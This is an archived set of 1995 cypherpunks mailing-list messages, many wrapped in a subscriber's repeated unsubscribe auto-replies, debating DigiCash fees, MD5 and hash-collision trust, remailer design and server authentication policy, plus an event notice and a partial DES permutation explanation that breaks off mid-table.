JrDE8g5Cx/JAGRa5FST9faQb8cjIUqOov8YPrcOcF7/54e+bIUmLcQ==
=3CrR
 -----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: agermain@cmp.com (Germain Arthur)
Date: Wed, 25 Oct 95 06:35:29 PDT
To: hfinney@shell.portal.com (Hal)
Subject: RE: Hack DigiCash: Payee Anonymity
Message-ID: <1995Oct25.093454.1151.341095@smtpgate.cmp.com>
MIME-Version: 1.0
Content-Type: text/plain



I have unsubscribed from this mailing list. Please remove my name from   
your personal address lists. Thanks.

ahg3

 ----------
From:  Hal[SMTP:hfinney@shell.portal.com]
Sent:  Tuesday, October 24, 1995 12:44 PM
To:  cypherpunks
Subject:  Re: Hack DigiCash: Payee Anonymity


nobody@replay.com (Name Withheld by Request) writes:

>Now all we need is to do is get some specs on how DigiCash's software   
works
>so that we can code this.  I expect that this method will become quite
>popular.  To withdraw DigiCash, one must come up with $250 to start,   
sign a
>bunch of forms, etc.  I suspect that most people would rather change   
money
>in lesser amounts, probably under $50.  This opens up a huge market for
>Blacknet money exchangers.  I would gladly pay Tim's Internet Cash   
Exchange
>a commission to exchange $50 worth of greenbacks for Digicash instead of
>dealing with Mark Twain and shelling out $250 to start..

I don't believe this $250 is correct.  The only place I see such a number
is on the application form, in the following clause:

"A maintenance fee of the foreign equivalent of $10 will be imposed each
statement period if the balance in your account falls below the foreign
equivalent of $250 on any day of the period."

This is for a "WorldCurrency Access Interest Account", which I don't
think is what is used for ecash.  For ecash the account opening fee is
$11 and the per-month fee is $5.  I don't see any reference to required
account minimums.

As far as the issue of coding up a payee-blinding cash system compatible
with this ecash, I agree that it would be good to see some specs now that
ecash is for real.  IMO Chaum has been getting a free ride based on his
reputation, with many people assuming that anything he is associated
with must be done right.  It is time for him to open his hand and reveal
his protocols so that people know exactly what they are trusting their
money to.

Hal






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: agermain@cmp.com (Germain Arthur)
Date: Wed, 25 Oct 95 06:34:55 PDT
To: x85849i1@cadet1.usma.edu (x85849i1)
Subject: RE: Verification of Registration
Message-ID: <1995Oct25.093454.1151.341097@smtpgate.cmp.com>
MIME-Version: 1.0
Content-Type: text/plain



I have unsubscribed from this mailing list. Please remove my name from   
your personal address lists. Thanks.

ahg3

 ----------
From:  Scott Brickner[SMTP:sjb@universe.digex.net]
Sent:  Tuesday, October 24, 1995 2:09 PM
To:  x85849i1
Cc:  cypherpunks
Subject:  Re: Verification of Registration


"Raymond Val" writes:
>Lynne L. Harrison writes:
>
>>  Curious.  Did anyone else receive this unsolicitated *invitation*?
>
>Everybody who receives mail from cypherpunks@toad.com received this
>message becuase the message was addressed to
>cypherpunks@toad.com.  Apparently someone may have
>joined this 'group' or service and used the cypherpunks address as
>the e-mail address.  Mayhap the cypherpunks@toad.com / cypherpunks
>userid/password.
>
>This would be my guess, of course.

Mine too.
>
>Does anybody know what this service does?

C|NET Central is a cable TV show which reports on the 'net.  The
service is their on-line address where you can get more details
on stuff they report.

Doesn't seem to be especially c-punks related, but I guess someone
didn't like the idea of having to reveal his identity just to look
at a web page.  You can probably assume that the password for the
"cypherpunks" userid on the server is either "cypherpunks" or
"writecode".






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: agermain@cmp.com (Germain Arthur)
Date: Wed, 25 Oct 95 06:35:05 PDT
To: mab@crypto.com (Matt Blaze)
Subject: RE: Hash collisions [was Re: MD5 weaknes
Message-ID: <1995Oct25.093455.1151.341098@smtpgate.cmp.com>
MIME-Version: 1.0
Content-Type: text/plain



I have unsubscribed from this mailing list. Please remove my name from   
your personal address lists. Thanks.

ahg3

 ----------
From:  Matt Blaze[SMTP:mab@crypto.com]
Sent:  Tuesday, October 24, 1995 3:02 PM
To:  hallam
Cc:  cypherpunks
Subject:  Hash collisions [was Re: MD5 weakness ? ...]



>
>>As to weaknesses, I seem to remember that someone managed to forge a
>>modification to a program used to observe networks on a Sun so that it
>>had the same MD5 checksum as the official trusted version.  But whether
>>this is real is not strictly the issue.
>
>Ron has not mentioned such an event to me and if that were the case I   
would
>seriously doubt that he would not have been told about it. The only   
comment
he
    

>generally makes is that he wrote MD5 because "MD4 was making me   
nervous".
>
>>In the case of the trust being placed in MD5 by Netscape, the   
assumption
>>being made (without adequate support as far as I can tell) is that an
>>MD5 checksum cannot be forced, through a chosen plaintext attack, to
>
>Netscape do not simply use the MD5 of the message, they are using (as I
>understand it) the PKCS#1 standard for makoing the signature. If not   
they
>probably have severe problems.
>
>>There has been no limit given by anyone on this list to the level of
>>trust they place in MD5.  Several people have posted (without
>>contention) that MD5 is sufficiently trustworthy to trust billions of
>>dollars in commerce to it's being able to prevent a selected plaintext
>>attack as eluded to above.
>
>NIST and the NSA trusted MD4 sufficiently to base SHA upon it. SHA is
preferab
 le
>in many ways to MD5, it has a different approach to extending the   
scheduling
a
 nd
>resist differential cryptanalysis. There is a problem with the   
compressor
>function of MD5 which I dislike. This is fairly irrelevant though since   
SSL
>allows other digests to be used.
>
> Phill

I hesitate to jump in to this exchange given the defensive and
vague nature of the discussion, but...

While I agree that SHA seems preferable, for a number of reasons,
to MD5, it is worth noting that Hans Dobbertin of the German Information
Security Agency recently found a collision in MD4. His attack
allows you to generate a pair of plainexts that generate the same hash.
A fast technique for finding a second plaintext that hashes to some given
value remains an open problem with MD4 (and SHA and MD5, for that   
matter).

As far as I can tell the attack does not readily generalize to MD5
or SHA.

 -matt






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: agermain@cmp.com (Germain Arthur)
Date: Wed, 25 Oct 95 06:35:18 PDT
To: hallam@w3.org (hallam)
Subject: RE: MD5 weakness ? [was Re: Netscape Log
Message-ID: <1995Oct25.093455.1151.341099@smtpgate.cmp.com>
MIME-Version: 1.0
Content-Type: text/plain



I have unsubscribed from this mailing list. Please remove my name from   
your personal address lists. Thanks.

ahg3

 ----------
From:  hallam[SMTP:hallam@w3.org]
Sent:  Tuesday, October 24, 1995 1:14 PM
To:  Dr. Frederick B. Cohen; cypherpunks
Cc:  hallam
Subject:  Re: MD5 weakness ? [was Re: Netscape Logic Bomb detailed by   
IETF]

Precedence: bulk


>As to weaknesses, I seem to remember that someone managed to forge a
>modification to a program used to observe networks on a Sun so that it
>had the same MD5 checksum as the official trusted version.  But whether
>this is real is not strictly the issue.

Ron has not mentioned such an event to me and if that were the case I   
would
seriously doubt that he would not have been told about it. The only   
comment
he
generally makes is that he wrote MD5 because "MD4 was making me nervous".

>In the case of the trust being placed in MD5 by Netscape, the assumption
>being made (without adequate support as far as I can tell) is that an
>MD5 checksum cannot be forced, through a chosen plaintext attack, to

Netscape do not simply use the MD5 of the message, they are using (as I
understand it) the PKCS#1 standard for makoing the signature. If not they   

probably have severe problems.

>There has been no limit given by anyone on this list to the level of
>trust they place in MD5.  Several people have posted (without
>contention) that MD5 is sufficiently trustworthy to trust billions of
>dollars in commerce to it's being able to prevent a selected plaintext
>attack as eluded to above.

NIST and the NSA trusted MD4 sufficiently to base SHA upon it. SHA is
preferable
in many ways to MD5, it has a different approach to extending the   
scheduling
and
resist differential cryptanalysis. There is a problem with the compressor   

function of MD5 which I dislike. This is fairly irrelevant though since   
SSL
allows other digests to be used.

 Phill





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: agermain@cmp.com (Germain Arthur)
Date: Wed, 25 Oct 95 06:35:28 PDT
To: fc@all.net (Dr. Frederick B. Cohen)
Subject: RE: MD5 weakness ? [was Re: Netscape Log
Message-ID: <1995Oct25.093455.1151.341100@smtpgate.cmp.com>
MIME-Version: 1.0
Content-Type: text/plain



I have unsubscribed from this mailing list. Please remove my name from   
your personal address lists. Thanks.

ahg3

 ----------
From:  Laurent Demailly[SMTP:dl@hplyot.obspm.fr]
Sent:  Tuesday, October 24, 1995 6:45 PM
To:  Dr. Frederick B. Cohen
Cc:  cypherpunks
Subject:  Re: MD5 weakness ? [was Re: Netscape Logic Bomb detailed by   
IETF]


<grrrrrrr>

Frederick B. Cohen writes:
 > >  > [...] uses an MD5 checksum which the members
 > >  > of this list seem to place unlimited trust in (incorrectly in my   
view,
 > >  > but that would be picking two nits with one keyboard entry).

[me]> Can you elaborate WITH FACTS on the supposed weakness of MD5 ?
                        **********
I wonder what is your definition of facts...

 > I didn't say that there were any weaknesses in MD5, all I said was:
 >  "unlimited trust ... (incorrectly in my view...)"
 >
 > The lack of adequate demonstration of strength is not the same as a
 > weakness.  It represents only a lack of adequate assurance for placing
 > more than a certain amount of trust in MD5 for the purpose it is being
 > used to accomplish.
 >
 > As to weaknesses, I seem to remember that someone managed to forge a
 > modification to a program used to observe networks on a Sun so that it
 > had the same MD5 checksum as the official trusted version.  But   
whether
This is absolute bullshit with a probability of (2^128-1)/2^128
 > this is real is not strictly the issue.
On the contrary real things should be the issue... not random thoughts

 > In the case of the trust being placed in MD5 by Netscape, the   
assumption
 > being made (without adequate support as far as I can tell) is that an
because you can't tell 1+1=2 doesn't imply people have to worry...
 > MD5 checksum cannot be forced, through a chosen plaintext attack, to
 > yield checksums of 1, 2, 3, 5, 7, 9, ...  on up to enough primes to
 > allow the known plaintext attack that gets the RSA private key used to
 > authenticate messages.  As far as I am aware (and I may not be aware   
of
 > everything) there is no reference work to support this assumption.  If
The fact that you obviously didn't take the time to do any
search/reading on the subject does not allow you to go on with mad
assumptions...
 > the assumption is wrong, then the whole SSL can fall to a selected
 > plaintext attack launchable (presumably) through those general purpose
 > Java aplets we have heard so much about.
FYI,  ( false => false ) is a true expression... starting from false
assumption you can demonstrate *anything*
{ if 1+1!=2, lots of things "fall"}
 [me]> [btw who talked about 'unlimited' trust ?]
 > There has been no limit given by anyone on this list to the level of
 > trust they place in MD5.  Several people have posted (without
 > contention) that MD5 is sufficiently trustworthy to trust billions of
 > dollars in commerce to it's being able to prevent a selected plaintext
 > attack as eluded to above.  If you think we should trust it, and you
 > don't limit your assessment of trust, what other assumption should I
 > make? If several people proclaim that trust and nobody stands up in
 > disagreement, tacit agreement is my normal (although not necessarily
 > justified) assumption.

AGAIN, the limit is 2^128 computer operations (as I quoted from the rfc
days ago), which is imo certainly NOT the weakest part of the security
chain...

Do you actually read anything people are mailing or writing ?
</grrrrrrr>

sorry again, I feel tested...

dl
 --
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|...
Freedom
Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent   
soixante
sept

cracking SEAL Team 6 counter-intelligence DES Pasqua Qaddafi class
 struggle






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: agermain@cmp.com (Germain Arthur)
Date: Wed, 25 Oct 95 06:35:31 PDT
To: pcw@access.digex.net (Peter Wayner)
Subject: RE: Does your software?
Message-ID: <1995Oct25.091900.1151.341101@smtpgate.cmp.com>
MIME-Version: 1.0
Content-Type: text/plain



I have unsubscribed from this mailing list. Please remove my name from   
your personal address lists. Thanks.

ahg3

 ----------
From:  Peter Wayner[SMTP:pcw@access.digex.net]
Sent:  Tuesday, October 24, 1995 2:33 PM
To:  Dr. Frederick B. Cohen
Cc:  cypherpunks
Subject:  Re: Does your software?



>My get-only server is available in source form, is 80 lines long and
>thus easily understood, has been shown to meet security properties, is
>now in the process of being mathematically proven to meet those
>properties, and is published in a refereed journal which can be used to
>confirm its contents in detail.  Hence, I do provide secure distribution
>through purely physical means.
>
Uh, proofs only go so far. There was one Cornell CS professor who was a
real devotee of "proving" your programs correct. He even published one of
his proofs in a "refereed" journal. Big whoop. It still had an error.

Proofs can help identify flaws, but they can never rule out all flaws.
That's why their name is so bogus. I wouldn't be surprised if you could
prove that the Finger daemon, which is sort of like a really low-level
GET-ONLY HTTP server, is also safe. In fact, your math proving ability
could probably even prove the pre-Robert Morris finger daemon is safe and
secure. If programmers don't think of preventing finger requests longer
that 512 bytes then why should the head-in-the-clouds program provers?

 - Peter


>--
>-> See: Info-Sec Heaven at URL http://all.net
>Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236

P.S. "FC" is your log in and "FC is found inscribed in the writings of   
the
Unabomber. Coincidence?





on't speak
officially, were to be torn apart and the ulterior motives speculated   
upon,
I'd either shut up on this list or get off it completely. (Recall that we
had Marc Andreessen on this list last December--for whatever reasons, and
there are likely several, he left. I recall many attacks on his company.   
He
perhaps figured "What the hell do I need this for?")

Legitimate, scientific analysis is commendable. The brute force attack on
Netscape was great, and even better was the random seed attack. But many   
of
the attacks are less solid:

"How can you people at Digital Datawhack produce such crap? The   
assumptions
you make in the Flogisticon module are disgusting, another example of
security through obscenity."

(What I think this piling on is likely to accomplish is to push company
list subscribers here to just shut up. They see that the more is said by
folks from Netscape, as the best current example, the more fireworks and
insults ensue. The less that is said the better. This is not a good
situation.)

I'm not arguing for "niceness," just that some of the edge be taken off   
the
attacks.

The "bounties" that are being offered in press releases have the danger   
of
inviting premature announcement of results. And of discouraging companies
from actively participating in this list and discussing what might be   
done
to improve security.

Just my views. No doubt some will think I'm a shill for some company.

 --Tim May



Views here are not the views of my Internet Service Provider or   
Government.
 ---------:---------:---------:---------:---------:---------:---------:----  

Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms,   
zero
Corralitos, CA              | knowledge, reputations, information   
markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: agermain@cmp.com (Germain Arthur)
Date: Wed, 25 Oct 95 06:35:50 PDT
To: sjb@universe.digex.net (Scott Brickner)
Subject: RE: Don't Kill the Messenger--A New Slan
Message-ID: <1995Oct25.093456.1151.341104@smtpgate.cmp.com>
MIME-Version: 1.0
Content-Type: text/plain



I have unsubscribed from this mailing list. Please remove my name from   
your personal address lists. Thanks.

ahg3

 ----------
From:  Scott Brickner[SMTP:sjb@universe.digex.net]
Sent:  Tuesday, October 24, 1995 12:59 PM
To:  Adam Shostack
Cc:  Cypherpunks Mailing List
Subject:  Re: Don't Kill the Messenger--A New Slant on Remailers


Adam Shostack writes:
> Who cares if you can read messages encrypted to the key or
>not?  Let everyone connect and download whatever messages they want to
>see.  They're encrypted, after all.

Two reasons.  One, it cuts down on traffic.  Why bother to waste the
server's bandwidth on something the client can't read anyway.  The only
possible reason someone could be asking for the data is because they're
trying to compromise the key or do traffic analysis.  Why help bad
guys?

Second, there's no reason the messages need to be encrypted.  The
server can accept messages addressed to *any* string of eight hex
digits, and doesn't care about the content.  The server needn't limit
the kinds of encryption used in the actual message.  It only cares that
the recipient is "really" (in some sense) the right reciever.

The original mental prompt for the idea came from the discussion of
the "key-is-the-person" model.  I was trying to devise a scenario where
it was possible to know of an entity only through his key, and came up
with this.  I also included the idea that messages signed by the key
would be forwarded by the server after being pseudonymized to the
keyid.  That way, the user could participate in mailing lists purely
identified by the key.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: agermain@cmp.com (Germain Arthur)
Date: Wed, 25 Oct 95 06:38:39 PDT
To: tcmay@got.net (tcmay)
Subject: RE: Crypto's Role in Evil?
Message-ID: <1995Oct25.093710.1151.341115@smtpgate.cmp.com>
MIME-Version: 1.0
Content-Type: text/plain



I have unsubscribed from this mailing list. Please remove my name from   
your personal address lists. Thanks.

ahg3

 ----------
From:  Carl Ellison[SMTP:cme@TIS.COM]
Sent:  Tuesday, October 24, 1995 12:52 PM
To:  tcmay
Cc:  cypherpunks
Subject:  Re: Crypto's Role in Evil?

Sender: owner-cypherpunks@toad.com
Precedence: bulk

>Date: Mon, 9 Oct 1995 11:20:41 -0700

I'm late getting to my mail backlog.

>From: tcmay@got.net (Timothy C. May)


>It's clear that cops cannot protect people, only try to catch the
perpetrators.

I heard a particularly scary quote from Director Freeh last Sunday on   
NPR's
Weekend Edition (I believe that was the show -- segment A-1) in which he
declared "our job is to protect the people".

If that were the FBI's job, then we'd have to look at it as one does to a
loving parent and give it all the authority and respect a child gives a
parent.

 - Carl

+-------------------------------------------------------------------------  
 -+
|Carl M. Ellison    cme@acm.org    http://www.clark.net/pub/cme     |
|PGP: E0414C79B5AF36750217BC1A57386478 & 61E2DE7FCB9D7984E9C8048BA63221A2   
 |
|  ``Officer, officer, arrest that man!  He's whistling a dirty song.''   
   |
+---------------------------------------------- Jean Ellison (aka Mother)   
 -+







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dmandl@bear.com (David Mandl)
Date: Wed, 25 Oct 95 06:56:13 PDT
To: agermain@cmp.com
Subject: RE: MD5 weakness ? [was Re: Netscape Log
Message-ID: <9510251351.AA17177@yeti.bsnet>
MIME-Version: 1.0
Content-Type: text/plain


> I have unsubscribed from this mailing list. Please remove my name from   
> your personal address lists. Thanks.
> 
> ahg3

We heard you the first 15 times, Einstein.

   --D.

--
*******************************************************************************
Bear Stearns is not responsible for any recommendation, solicitation, offer or
agreement or any information about any transaction, customer account or account
activity contained in this communication.
*******************************************************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark <mark@lochard.com.au>
Date: Tue, 24 Oct 95 17:16:29 PDT
To: fc@all.net (Dr. Frederick B. Cohen)
Subject: Re: MD5 weakness ? [was Re: Netscape Logic Bomb detailed by IETF]
In-Reply-To: <9510241442.AA12411@all.net>
Message-ID: <199510242256.AA20036@junkers.lochard.com.au>
MIME-Version: 1.0
Content-Type: text


>As to weaknesses, I seem to remember that someone managed to forge a
>modification to a program used to observe networks on a Sun so that it
>had the same MD5 checksum as the official trusted version.  But whether
>this is real is not strictly the issue. 

From memory that particular attack had more to do with altered operating
systems which reported back the correct information than anything to do with
a md5 hole. It is much easier to tell a program to say "abcdef" than it is
to come up with a series of bits that hash to the same md5 result as another
series of bits.

Keep trying Fred... you may get somewhere one day.

Mark
mark@lochard.com.au



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Wed, 25 Oct 95 06:55:27 PDT
To: fc@all.net (Dr. Frederick B. Cohen)
Subject: Re: Does your software?
In-Reply-To: <9510251119.AA23193@all.net>
Message-ID: <199510251358.JAA24328@homeport.org>
MIME-Version: 1.0
Content-Type: text


	This is a failure in the (TCP wrappers?) that should be
reconfigured.

	Since the service you are providing is available without any
authentication, there is no reason to match hostnames to IPs with a
double reverse lookup.

	Since your server is secure, what does it really matter where
the connections are coming from?  If netscape chooses to hide host
information, they should be allowed to.

	Cypherpunk relevance?  Its wrong to demand authentication when
you don't care.  Airports, bars, 'anonymous' FTP servers and the like
should all take the level of authentication they need.

Adam


| If so, your firewall (or other mechanism) is presenting an incomplete
| falsehood about the mapping between your host name and your IP address.
| 
| Oct 24 21:19:15 all in.thttpd[20865]: warning: can't verify hostname: gethostbyname(unknown.netscape.com) failed
| Oct 24 21:19:15 all in.thttpd[20865]: refused connect from 198.95.250.69

| My server refuses connections from hosts when the IP address doesn't
| match to the host name.  This is a common method for reducing the level
| of address forgery on the Internet.  Please ask your firewall manager to
| repair the firewall so we can authenticate you.



-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Wed, 25 Oct 95 07:05:43 PDT
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: CJR returned to sender
In-Reply-To: <acb323bd030210041822@[205.199.118.202]>
Message-ID: <Pine.SUN.3.91.951025100419.15559D-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


I agree strongly with Tim May that this (fun) little joke has gone far
enough.  I enjoyed it while it lasted, but the CJR was clearly frivolous,
the T-Shirt was clearly not a munition, IMHO, and that's that.  Write up
the experience, post it on the web somewhere (I'll provide a space if you
need it), and call it a day. 

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's hot here.  And humid.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Wed, 25 Oct 95 07:09:01 PDT
To: adam@homeport.org (Adam Shostack)
Subject: Re: Does your software?
In-Reply-To: <199510251358.JAA24328@homeport.org>
Message-ID: <9510251406.AA10301@all.net>
MIME-Version: 1.0
Content-Type: text


> 	This is a failure in the (TCP wrappers?) that should be
> reconfigured.

That's a policy decision, not a technical one.  The policy I have
decided to follow is that I don't support people with non-authenticable
IP addresses.  I feel it is in the best interest of the Internet and of
the organizations using the Internet (like Netscape) that I prevent
people from claiming to be from Netscape with possibly forged IP
addresses.  You should feel free to make your policy decisions as
you feel best, while I certainly exercize that freedom on my end.

> 	Since the service you are providing is available without any
> authentication, there is no reason to match hostnames to IPs with a
> double reverse lookup.

That's not right.  My service requires authentication in the sense of
not allowing obviously forged IP addresses.  The audit trails generated
by the process allow me to my services, send mail (when people use the
ident daemon) about improvements.  For example, there was an
inaccessible file due to an error on my part - my automated error
detection system popped the error up on the screen within a few seconds,
I investigated, fixed the proteciton setting, and sent email to the
person letting them know that the file was now accessible and that it
way my fault.  This is also used as part of the identification process
used to assure that information is not sent to locations where I am
aware it is illegal to send it.  For example, Singapore has restrictions
that make it illegal to send them certain things, and I check for their
addresses as part of my access controls - made feasible via the IP
address verification process.

> 	Since your server is secure, what does it really matter where
> the connections are coming from?  If netscape chooses to hide host
> information, they should be allowed to.

Because secure means more than "you can't harm me by using it".  It
implies integrity, availability, confidentiality, and redundancy to
provide assurance that those things are the case.  It implies not only
keeping my site from being attacked, but trying to obey the laws of
countries from all over the world, keeping my site from being use to
attack other sites, limiting legal liabilities, and on and on.  If
someone choses to use a non-verifiable network address, I choose to
not provide services.

> 	Cypherpunk relevance?  Its wrong to demand authentication when
> you don't care.  Airports, bars, 'anonymous' FTP servers and the like
> should all take the level of authentication they need.

It's wrong to make assumptions about what I care about when you haven't
asked me.  I care about you and everyone else using the Internet.  I
care enough to help prevent forgeries by not supporting them, and to
help people debug their (perhaps faulty) firewalls by identifying the
source of problems and helping them resolve them.  I think that
authentication at some level is appropriate for anyone who uses
computers, even anonymously.

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Wed, 25 Oct 95 07:27:04 PDT
To: cypherpunks@toad.com
Subject: BSDC: Designing Systems for Electronic Commerce
Message-ID: <v02120d00acb3ef808714@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

                 The Boston Society for Digital Commerce

                               Presents

                              Win Treese
                            Open Market, Inc.

                 Designing Systems for Electronic Commerce


                        Tuesday, November 7, 1995
                               12 - 2 PM
                   The Downtown Harvard Club of Boston
                     One Federal Street, Boston, MA


Win Treese is Director of Security and Advanced Technology for Open
Market, Inc., a startup company building systems and software for
electronic commerce on open networks.  Before joining Open Market, he
was a member of the research staff at the Cambridge Research
Laboratory of Digital Equipment Corporation, where he worked on a
variety of projects, including the design and implementation of
Digital's Internet firewall system and the AudioFile network audio
system.

Win says:

>"Electronic commerce" is a short name for a big topic. In this talk I
>will describe Open Market's Transaction Management System and other
>components that can be used in many different applications, such as
>ordering of retail products for delivery, subscription access to
>information, "pay-per-page" purchasing of information, and others. In
>addition to payment, I will discuss other issues that arise in
>commerce, such as customer service and content management.


This meeting of the Boston Society for Digital Commerce will be held on
Tuesday, November 7, 1995 from 12pm - 2pm at the Downtown Branch of the
Harvard Club of Boston, One Federal Street. The price for lunch is $27.50.
This price includes lunch, room rental, and the speaker's lunch. ;-).  The
Harvard Club *does* have a jacket and tie dress code.

We need to receive a company check, or money order, (or if we *really* know
you, a personal check) payable to "The Harvard Club of Boston", by Saturday,
November 4 (that's one week from this Saturday), or you won't be on the list
for lunch. Checks payable to anyone else but The Harvard Club of Boston will
have to be sent back.

Checks should be sent to Robert Hettinga, c/o The Shipwright Development
Corporation, 44 Farquhar Street, Boston, Massachusetts, 02131. Again, they
must be made payable to "The Harvard Club of Boston".

If anyone has questions, or has a problem with these arrangements (We've had
to work with a few glacial A/P departments ourselves, for instance), please
let us know via e-mail, and we'll see if we can work something out.


November's speaker will be Art Hutchinson of Northeast Consulting Resources,
Inc.


We are actively searching for future speakers.  If you are in Boston on the
first Tuesday of the month, and you would like to make a presentation to the
Society, please send e-mail to the BSDC Program Commmittee care of Robert
Hettinga, rah@shipwright.com .

For more information about the Boston Society for Digital Commerce, send
"info bsdc" in the body of a message to majordomo@ai.mit.edu .  If you want
to subscribe to the BSDC e-mail list, send "subscribe bsdc" in the body of a
message to majordomo@ai.mit.edu .

Looking forward to seeing you there!

Cheers,
Bob Hettinga
Interim Moderator,
The Boston Society for Digital Commerce





-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMI5Iw/gyLN8bw6ZVAQF3FQP+LxoCbP4AoijIMobOVE1PzX066WrmvwMb
pSaSpBP4F7/XJ0NP2EdKDZw24xpqxrvKm6j+FDzC3dDWcR3zlZPeEjvIGSFpNDW4
QJhGDlBfDo8LPAp9ua28CwxDSeyFmUZcMIjh7cgVOjCuG9Gegkn0jO3MihtrDb7U
yki9gTYDaNw=
=2VH9
-----END PGP SIGNATURE-----

-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: koontz@MasPar.COM (David G. Koontz)
Date: Wed, 25 Oct 95 10:44:15 PDT
To: sommerfeld@orchard.medford.ma.us
Subject: Re: textbooks
Message-ID: <9510251744.AA23624@argosy.MasPar.COM>
MIME-Version: 1.0
Content-Type: text/plain


IP/FP and PC1 describe how to get from input bytes to L, R, C and D Blocks:

 
The Initial Permutation
 
The Initial Permuation (IP) is a description of how a byte wide interface is
connected to a 64 bit block comprised of two 32 bit blocks (L and R).  Consider
a byte wide interface with the bits numbered 1-8.  The event numbered bits
go to the L Block and the odd numbered bits go to the R block.  Note that the
bit order is big endian, where bit 1 is most significant and bit 8 is least
least significant.  The input block is typically loaded as 8 successive byte 
loads:
 
Port    MSB7     Input  (LR)                     Left
 Bit    Bit             Block (64 bits)                 Block (32 bits)
 
  2------6-------58 50 42 34 26 18 10  2                 1  2  3  4  5  6  7  8
  4------4-------60 52 44 36 28 20 12  4                 9 10 11 12 13 14 15 16
  6------2-------62 54 46 38 30 22 14  6                17 18 19 20 21 22 23 24
  8------0-------64 56 48 40 32 24 16  8                25 26 27 28 29 30 31 32
 
                                                        Right
                                                        Block (32 bits)
  1------7-------57 49 41 33 25 17  9  1                 1  2  3  4  5  6  7  8
  3------5-------59 51 43 35 27 19 11  3                 9 10 11 12 13 14 15 16
  5------3-------61 53 45 37 29 21 13  5                17 18 19 20 21 22 23 24
  7------1-------63 55 47 39 31 23 15  7                25 26 27 28 29 30 31 32
 
Input Byte        8  7  6  5  4  3  2  1
 
The Final Permutation
 
The Final Permutation (IP-1) provides the inverse, it standarizes the output
of the R16L16 output block to a byte wide interface.  The Output block is
ordered Right then Left to allow complementary operation for subsequent
decryption.  Were one to perform an IP followed by IP-1 without any intervening
round iteration operations, one would end up with odd and even bits swapped:
 
Right                           Output (R16L16)               Standard  Port
Block (32 bits)                 Block   (64 bits)               Bit      Bit
 
 1  2  3  4  5  6  7  8          1  2  3  4  5  6  7  8---------6--------2
 9 10 11 12 13 14 15 16          9 10 11 12 13 14 15 16---------4--------4
17 18 19 20 21 22 23 24         17 18 19 20 21 22 23 24---------2--------6
25 26 27 28 29 30 31 32         25 26 27 28 29 30 31 32---------0--------8
 
Left
Block (32 bits)
 
 1  2  3  4  5  6  7  8         33 34 35 36 37 38 39 40---------7--------1
 9 10 11 12 13 14 15 16         41 42 43 44 45 46 47 48---------5--------3
17 18 19 20 21 22 23 24         49 50 51 52 53 54 55 56---------3--------5
25 26 27 28 29 30 31 32         57 58 59 60 61 62 63 64---------1--------7
 
Output Byte                      8  7  6  5  4  3  2  1
 
 
From FIPS Pub 46-2:
 
Final Permuation IP-1:
                                   Output Byte
40  8 48 16 56 24 64 32                 1
39  7 47 15 55 23 63 31                 2
38  6 46 14 54 22 62 30                 3
37  5 45 13 53 21 61 29                 4
36  4 44 12 52 20 60 28                 5
35  3 43 11 51 19 59 27                 6
34  2 42 10 50 18 58 26                 7
33  1 41  9 49 17 57 25                 8
 
 1  2  3  4  5  6  7  8 Port Bit
 7  6  5  4  3  2  1  0 MSB7 Bits
 
In the simplest hardware implementation of DES, the Left and Right blocks are
comprised in hardware of four 8 bit register each.  Each 8 bit register can be
serially loaded (IP), serially unloaded (IP-1), or parallel output and parallel
loaded (round interation).  DES is an encryption algorithm originally required
to be implemented in hardware, specified in 1977 - predating 16 or 32 bit
microprocessor peripherals.
 
Permuted Choice 1
 
PC1 performs a similar function loading the C and D 28 bit registers (comprised
of three 8 bit bidirectional shift register and 1 4 bit bidirectional shift
register, all with parallel outputs).  The C and D registers can be serially
loaded (shifting right), or serially shifted left or right in a closed ring
for encryption or decryption.
 
Port    MSB7                                                                
Bits     Bits                                                           
                           
                Input   (CD)                            C
                        Block, 64 bits                  Block (28 bits)
 
1--------7------57 49 41 33 25 17  9  1         MS       1  2  3  4  5  6  7  8
